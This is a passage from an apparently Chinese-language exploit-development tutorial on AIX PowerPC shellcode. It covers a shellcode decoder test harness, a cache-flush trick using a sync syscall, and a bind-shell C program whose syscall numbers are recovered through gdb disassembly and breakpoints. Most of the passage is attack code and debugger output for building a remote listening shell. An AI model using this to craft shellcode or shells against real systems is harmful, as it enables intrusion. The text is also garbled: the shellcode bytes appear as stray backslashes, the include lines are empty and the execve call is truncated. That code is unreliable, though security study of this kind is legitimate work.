char shellcode[] = // decoder
\\\
\
\\
\\
\\
\\
\
\
\\
// real shellcode
\\\\\\
\\
\\;
int main() {
int jump[2]={(int)shellcode,0}; ((*(void (*)())jump)()); }
-bash-2.05b$ ./test_3 $ id
uid=202(san) gid=1(staff) $ exit -bash-2.05b$
只需在真实的shellcode前面插入一个系统调用(这里使用的是sync的调用号,用其它也可以),系统调用执行完以后会跳到lr寄存器包含的地址执行,这时执行的指令不是缓存的。
七、远程溢出调试
lsd在UNIX Assembly Codes Development for Vulnerabilities Illustration Purposes这份文档里提供了AIX的一系列远程shellcode,由于AIX的系统调用中断号在各系统版本里都是不同的,所以我们需要把它找出来。
一个简单的监听端口的shellcode用C语言表示大致如下:
-bash-2.05b$ cat bind.c #include #include #include #include
int soc,cli,i;
struct sockaddr_in serv_addr;
int main() {
serv_addr.sin_family=2; serv_addr.sin_addr.s_addr=0; serv_addr.sin_port=0x1234; soc=socket(2,1,0);
bind(soc,(struct sockaddr *)&serv_addr,0x10); listen(soc,5); cli=accept(soc,0,0);
for (i=2;i>=0;i--) { close(i);
kfcntl(cli, 0, i); }
execve(\}
AIX的dup2函数实际上最终调用的还是kfcntl系统调用。编译后,用gdb调试:
-bash-2.05b$ gdb bind GNU gdb 6.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type \
There is absolutely no warranty for GDB. Type \This GDB was configured as \(gdb) disas main
Dump of assembler code for function main: 0x10000534 : mflr r0
0x10000538 : stw r31,-4(r1) 0x1000053c : stw r0,8(r1) 0x10000540 : stwu r1,-72(r1) 0x10000544 : mr r31,r1 0x10000548 : lwz r9,108(r2) 0x1000054c : li r0,2 0x10000550 : stb r0,1(r9) 0x10000554 : lwz r9,108(r2) 0x10000558 : li r0,0 0x1000055c : stw r0,4(r9) 0x10000560 : lwz r9,108(r2) 0x10000564 : li r0,4660 0x10000568 : sth r0,2(r9) 0x1000056c : li r3,2 0x10000570 : li r4,1 0x10000574 : li r5,0
0x10000578 : bl 0x1000734c 0x1000057c : lwz r2,20(r1) 0x10000580 : mr r0,r3 0x10000584 : lwz r9,112(r2) 0x10000588 : stw r0,0(r9) 0x1000058c : lwz r9,112(r2) 0x10000590 : lwz r3,0(r9) 0x10000594 : lwz r4,108(r2) 0x10000598 : li r5,16
0x1000059c : bl 0x10007448 0x100005a0 : lwz r2,20(r1) 0x100005a4 : lwz r9,112(r2) 0x100005a8 : lwz r3,0(r9) 0x100005ac : li r4,5
0x100005b0 : bl 0x1000746c 0x100005b4 : lwz r2,20(r1) 0x100005b8 : lwz r9,112(r2) 0x100005bc : lwz r3,0(r9) 0x100005c0 : li r4,0 0x100005c4 : li r5,0
0x100005c8 : bl 0x10007394 0x100005cc : lwz r2,20(r1) 0x100005d0 : mr r0,r3 0x100005d4 : lwz r9,116(r2) 0x100005d8 : stw r0,0(r9) 0x100005dc : lwz r9,120(r2) 0x100005e0 : li r0,2 0x100005e4 : stw r0,0(r9) 0x100005e8 : lwz r9,120(r2) 0x100005ec : lwz r0,0(r9) 0x100005f0 : cmpwi r0,0
0x100005f4 : bge- 0x100005fc 0x100005f8 : b 0x10000640 0x100005fc : lwz r9,120(r2) 0x10000600 : lwz r3,0(r9)
0x10000604 : bl 0x100074b4 0x10000608 : lwz r2,20(r1) 0x1000060c : lwz r9,116(r2) 0x10000610 : lwz r11,120(r2) 0x10000614 : lwz r3,0(r9) 0x10000618 : li r4,0 0x1000061c : lwz r5,0(r11)
0x10000620 : bl 0x100074d8 0x10000624 : lwz r2,20(r1) 0x10000628 : lwz r11,120(r2) 0x1000062c : lwz r9,120(r2) 0x10000630 : lwz r9,0(r9) 0x10000634 : addi r0,r9,-1 0x10000638 : stw r0,0(r11)
0x1000063c : b 0x100005e8 0x10000640 : lwz r3,124(r2) 0x10000644 : li r4,0 0x10000648 : li r5,0
0x1000064c : bl 0x10007328 0x10000650 : lwz r2,20(r1) 0x10000654 : mr r3,r0 0x10000658 : lwz r1,0(r1) 0x1000065c : lwz r0,8(r1) 0x10000660 : mtlr r0
0x10000664 : lwz r31,-4(r1) 0x10000668 : blr 0x1000066c : .long 0x0 0x10000670 : .long 0x2061 0x10000674 : lwz r0,1(r1)
0x10000678 : .long 0x138 0x1000067c : .long 0x46d61 0x10000680 : xori r14,r11,7936 End of assembler dump.
gdb能够显示各函数的入口地址,我们在这些入口地址分别下断点:
(gdb) b *0x1000734c Breakpoint 1 at 0x1000734c (gdb) b *0x10007448 Breakpoint 2 at 0x10007448 (gdb) b *0x1000746c Breakpoint 3 at 0x1000746c (gdb) b *0x10007394 Breakpoint 4 at 0x10007394 (gdb) b *0x100074b4 Breakpoint 5 at 0x100074b4 (gdb) b *0x100074d8 Breakpoint 6 at 0x100074d8 (gdb) b *0x10007328 Breakpoint 7 at 0x10007328
下完断点后运行,gdb会在各函数里停下,这时我们就可以查看它的系统调用号。如果是包裹函数,一直用si单步执行下去,就能看到该函数最终实际调用的系统中断。 (gdb) r
Starting program: /home/san/bind
Breakpoint 1, 0x1000734c in socket () (gdb) x/8i $pc
0x1000734c : lwz r12,4(r2) 0x10007350 : stw r2,20(r1) 0x10007354 : lwz r0,0(r12) 0x10007358 : lwz r2,4(r12) 0x1000735c : mtctr r0 0x10007360 : bctr 0x10007364 : .long 0x0 0x10007368 : .long 0xc8000 (gdb) si
0x10007350 in socket () (gdb)
0x10007354 in socket () (gdb)
0x10007358 in socket ()